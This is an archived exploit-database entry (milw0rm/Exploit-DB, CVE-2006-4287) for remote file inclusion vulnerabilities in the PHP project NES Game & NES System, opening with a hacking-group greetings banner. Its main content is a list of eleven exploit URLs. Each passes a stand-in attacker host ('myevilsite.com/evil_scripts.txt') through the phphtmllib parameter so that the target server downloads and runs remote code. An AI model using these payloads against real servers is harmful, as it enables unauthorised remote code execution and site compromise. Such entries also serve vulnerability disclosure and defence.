NES Game and NES System <= c108122 File Include Vulnerabilities

  • EDB-ID: 2226
  • CVE: 2006-4287
  • OSVDB-ID: 28044
  • Author: Kacper
  • Published: 2006-08-20
  • Verified: Verified
  • Exploit Code:   Download
  • Vulnerable App:    N/A
Next Exploit Previous Exploit Home 
/*
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
-   - - [DEVIL TEAM THE BEST POLISH TEAM] - -
+
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
- NES Game & NES System <= c108122 (phphtmllib) Remote File Include Vulnerability
+
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
- [Script name: NES Game & NES System v. c108122
- [Script site: http://sourceforge.net/projects/nesgame
+
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
-          Find by: Kacper (a.k.a Rahim)
+
-          Contact: kacper1964@yahoo.pl
-                        or
-          http://www.devilteam.yum.pl/
-                       and
-           http://www.rahim.webd.pl/
+
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
- Special Greetz: DragonHeart ;-)
- Ema: Leito, Adam, DeathSpeed, Drzewko, pepi
-
!@ Przyjazni nie da sie zamienic na marne korzysci @!
+
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
-            Z Dedykacja dla osoby,
-         bez ktorej nie mogl bym zyc...
-           K.C:* J.M (a.k.a Magaja)
+
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
*/
/*

a lot of include vulnerability .....

*/
#Exploit:

http://www.site.com/[NES_path]/phphtmllib/includes.php?phphtmllib=[http://www.myevilsite.com/evil_scripts.txt]
http://www.site.com/[NES_path]/phphtmllib/tag_utils/divtag_utils.php?phphtmllib=[http://www.myevilsite.com/evil_scripts.txt]
http://www.site.com/[NES_path]/phphtmllib/tag_utils/form_utils.php?phphtmllib=[http://www.myevilsite.com/evil_scripts.txt]
http://www.site.com/[NES_path]/phphtmllib/tag_utils/html_utils.php?phphtmllib=[http://www.myevilsite.com/evil_scripts.txt]
http://www.site.com/[NES_path]/phphtmllib/tag_utils/localinc.php?phphtmllib=[http://www.myevilsite.com/evil_scripts.txt]
http://www.site.com/[NES_path]/phphtmllib/widgets/FooterNav.php?phphtmllib=[http://www.myevilsite.com/evil_scripts.txt]
http://www.site.com/[NES_path]/phphtmllib/widgets/HTMLPageClass.php?phphtmllib=[http://www.myevilsite.com/evil_scripts.txt]
http://www.site.com/[NES_path]/phphtmllib/widgets/InfoTable.php?phphtmllib=[http://www.myevilsite.com/evil_scripts.txt]
http://www.site.com/[NES_path]/phphtmllib/widgets/localinc.php?phphtmllib=[http://www.myevilsite.com/evil_scripts.txt]
http://www.site.com/[NES_path]/phphtmllib/widgets/NavTable.php?phphtmllib=[http://www.myevilsite.com/evil_scripts.txt]
http://www.site.com/[NES_path]/phphtmllib/widgets/TextNav.php?phphtmllib=[http://www.myevilsite.com/evil_scripts.txt]

# milw0rm.com [2006-08-20]